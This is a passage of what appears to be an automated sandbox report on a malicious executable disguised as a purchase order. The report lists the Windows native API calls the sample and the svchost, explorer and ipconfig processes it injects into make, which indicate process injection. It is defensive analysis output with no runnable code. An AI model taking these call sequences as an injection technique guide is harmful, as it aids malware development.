          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AD0 NtReadFile,LdrInitializeThunk,2_2_03872AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03872F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FB0 NtResumeThread,LdrInitializeThunk,2_2_03872FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FE0 NtCreateFile,LdrInitializeThunk,2_2_03872FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F30 NtCreateSection,LdrInitializeThunk,2_2_03872F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_03872E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03872EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DD0 NtDelayExecution,LdrInitializeThunk,2_2_03872DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D10 NtMapViewOfSection,LdrInitializeThunk,2_2_03872D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_03872D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_03872CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03872C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874340 NtSetContextThread,2_2_03874340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03874650 NtSuspendThread,2_2_03874650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872C60 NtCreateKey,2_2_03872C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873090 NtSetValueKey,2_2_03873090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038735C0 NtCreateMutant,2_2_038735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03873D70 NtOpenThread,2_2_03873D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,2_2_03DBA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBA042 NtQueryInformationProcess,2_2_03DBA042
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0568A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,2_2_0568A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0568A042 NtQueryInformationProcess,2_2_0568A042
          Source: C:\Windows\explorer.exeCode function: 3_2_10387232 NtCreateFile,3_2_10387232
          Source: C:\Windows\explorer.exeCode function: 3_2_10388E12 NtProtectVirtualMemory,3_2_10388E12
          Source: C:\Windows\explorer.exeCode function: 3_2_10388E0A NtProtectVirtualMemory,3_2_10388E0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932B60 NtClose,LdrInitializeThunk,5_2_03932B60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932AD0 NtReadFile,LdrInitializeThunk,5_2_03932AD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932FE0 NtCreateFile,LdrInitializeThunk,5_2_03932FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932F30 NtCreateSection,LdrInitializeThunk,5_2_03932F30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_03932EA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932DD0 NtDelayExecution,LdrInitializeThunk,5_2_03932DD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03932DF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03932D10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03932CA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03932C70
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932C60 NtCreateKey,LdrInitializeThunk,5_2_03932C60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039335C0 NtCreateMutant,LdrInitializeThunk,5_2_039335C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03934340 NtSetContextThread,5_2_03934340
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03934650 NtSuspendThread,5_2_03934650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932B80 NtQueryInformationFile,5_2_03932B80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932BA0 NtEnumerateValueKey,5_2_03932BA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932BF0 NtAllocateVirtualMemory,5_2_03932BF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932BE0 NtQueryValueKey,5_2_03932BE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932AB0 NtWaitForSingleObject,5_2_03932AB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932AF0 NtWriteFile,5_2_03932AF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932F90 NtProtectVirtualMemory,5_2_03932F90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932FB0 NtResumeThread,5_2_03932FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932FA0 NtQuerySection,5_2_03932FA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932F60 NtCreateProcessEx,5_2_03932F60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932E80 NtReadVirtualMemory,5_2_03932E80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932EE0 NtQueueApcThread,5_2_03932EE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932E30 NtWriteVirtualMemory,5_2_03932E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932DB0 NtEnumerateKey,5_2_03932DB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932D00 NtSetInformationFile,5_2_03932D00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932D30 NtUnmapViewOfSection,5_2_03932D30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932CC0 NtQueryVirtualMemory,5_2_03932CC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932CF0 NtOpenProcess,5_2_03932CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932C00 NtQueryInformationProcess,5_2_03932C00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03933090 NtSetValueKey,5_2_03933090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03933010 NtOpenDirectoryObject,5_2_03933010
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039339B0 NtGetContextThread,5_2_039339B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03933D10 NtOpenProcessToken,5_2_03933D10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03933D70 NtOpenThread,5_2_03933D70
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA3D0 NtReadFile,5_2_02FCA3D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA320 NtCreateFile,5_2_02FCA320
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA450 NtClose,5_2_02FCA450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA31D NtCreateFile,5_2_02FCA31D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA44A NtClose,5_2_02FCA44A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037A9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_037A9BAF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_037AA036
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037A9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_037A9BB2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037AA042 NtQueryInformationProcess,5_2_037AA042
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004096A00_2_004096A0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0042200C0_2_0042200C
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0041A2170_2_0041A217
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004122160_2_00412216
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0042435D0_2_0042435D
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004033C00_2_004033C0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044F4300_2_0044F430
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004125E80_2_004125E8
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044663B0_2_0044663B
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004138010_2_00413801
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0042096F0_2_0042096F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004129D00_2_004129D0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004119E30_2_004119E3
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0041C9AE0_2_0041C9AE
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0047EA6F0_2_0047EA6F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040FA100_2_0040FA10
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044EB5F0_2_0044EB5F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00423C810_2_00423C81
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00411E780_2_00411E78
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00442E0C0_2_00442E0C
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00420EC00_2_00420EC0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044CF170_2_0044CF17
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00444FD20_2_00444FD2
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_03FA36680_2_03FA3668
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D89D2_2_0041D89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C3F22_2_0041C3F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E4C2_2_00409E4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E79D2_2_0041E79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F02_2_0384E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039003E62_2_039003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA3522_2_038FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C02C02_2_038C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E02742_2_038E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039001AA2_2_039001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F81CC2_2_038F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038301002_2_03830100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA1182_2_038DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C81582_2_038C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D20002_2_038D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C02_2_0383C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038647502_2_03864750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038407702_2_03840770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C6E02_2_0385C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039005912_2_03900591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038405352_2_03840535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EE4F62_2_038EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E44202_2_038E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F24462_2_038F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F6BD72_2_038F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB402_2_038FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA802_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A02_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390A9A62_2_0390A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038569622_2_03856962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038268B82_2_038268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E8F02_2_0386E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A8402_2_0384A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038428402_2_03842840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BEFA02_2_038BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC82_2_03832FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE02_2_0384CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03882F282_2_03882F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860F302_2_03860F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E2F302_2_038E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4F402_2_038B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852E902_2_03852E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FCE932_2_038FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEEDB2_2_038FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEE262_2_038FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840E592_2_03840E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03858DBF2_2_03858DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383ADE02_2_0383ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384AD002_2_0384AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DCD1F2_2_038DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0CB52_2_038E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830CF22_2_03830CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840C002_2_03840C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A2_2_0388739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D2_2_038F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C2_2_0382D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A02_2_038452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C02_2_0385B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED2_2_038E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B02_2_0384B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387516C2_2_0387516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F1722_2_0382F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B16B2_2_0390B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF0CC2_2_038EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C02_2_038470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F70E92_2_038F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF0E02_2_038FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF7B02_2_038FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC2_2_038F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DD5B02_2_038DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F75712_2_038F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF43F2_2_038FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038314602_2_03831460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FB802_2_0385FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B5BF02_2_038B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387DBF92_2_0387DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFB762_2_038FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DDAAC2_2_038DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03885AA02_2_03885AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E1AA32_2_038E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EDAC62_2_038EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFA492_2_038FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7A462_2_038F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B3A6C2_2_038B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D59102_2_038D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038499502_2_03849950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B9502_2_0385B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038438E02_2_038438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD8002_2_038AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841F922_2_03841F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFFB12_2_038FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFF092_2_038FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03849EB02_2_03849EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FDC02_2_0385FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843D402_2_03843D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F1D5A2_2_038F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7D732_2_038F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFCF22_2_038FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B9C322_2_038B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBA0362_2_03DBA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBB2322_2_03DBB232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB10822_2_03DB1082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBE5CD2_2_03DBE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB5B322_2_03DB5B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB5B302_2_03DB5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB89122_2_03DB8912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB2D022_2_03DB2D02
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0568A0362_2_0568A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_05682D022_2_05682D02
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0568E5CD2_2_0568E5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_056889122_2_05688912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_056810822_2_05681082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_05685B302_2_05685B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_05685B322_2_05685B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0568B2322_2_0568B232
          Source: C:\Windows\explorer.exeCode function: 3_2_0F156B303_2_0F156B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0F156B323_2_0F156B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0F15C2323_2_0F15C232
          Source: C:\Windows\explorer.exeCode function: 3_2_0F1599123_2_0F159912
          Source: C:\Windows\explorer.exeCode function: 3_2_0F153D023_2_0F153D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0F15F5CD3_2_0F15F5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0F15B0363_2_0F15B036
          Source: C:\Windows\explorer.exeCode function: 3_2_0F1520823_2_0F152082
          Source: C:\Windows\explorer.exeCode function: 3_2_103872323_2_10387232
          Source: C:\Windows\explorer.exeCode function: 3_2_103860363_2_10386036
          Source: C:\Windows\explorer.exeCode function: 3_2_1037D0823_2_1037D082
          Source: C:\Windows\explorer.exeCode function: 3_2_10381B303_2_10381B30
          Source: C:\Windows\explorer.exeCode function: 3_2_10381B323_2_10381B32
          Source: C:\Windows\explorer.exeCode function: 3_2_103849123_2_10384912
          Source: C:\Windows\explorer.exeCode function: 3_2_1037ED023_2_1037ED02
          Source: C:\Windows\explorer.exeCode function: 3_2_1038A5CD3_2_1038A5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_1085F0823_2_1085F082
          Source: C:\Windows\explorer.exeCode function: 3_2_108680363_2_10868036
          Source: C:\Windows\explorer.exeCode function: 3_2_1086C5CD3_2_1086C5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10860D023_2_10860D02
          Source: C:\Windows\explorer.exeCode function: 3_2_108669123_2_10866912
          Source: C:\Windows\explorer.exeCode function: 3_2_108692323_2_10869232
          Source: C:\Windows\explorer.exeCode function: 3_2_10863B323_2_10863B32
          Source: C:\Windows\explorer.exeCode function: 3_2_10863B303_2_10863B30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_00CB39FE5_2_00CB39FE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0390E3F05_2_0390E3F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039C03E65_2_039C03E6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039BA3525_2_039BA352
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039802C05_2_039802C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039A02745_2_039A0274
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039C01AA5_2_039C01AA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B41A25_2_039B41A2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039B81CC5_2_039B81CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0399A1185_2_0399A118
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038F01005_2_038F0100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039881585_2_03988158
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039920005_2_03992000
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_038FC7C05_2_038FC7C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039247505_2_03924750
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039007705_2_03900770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_0391C6E05_2_0391C6E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039C05915_2_039C0591
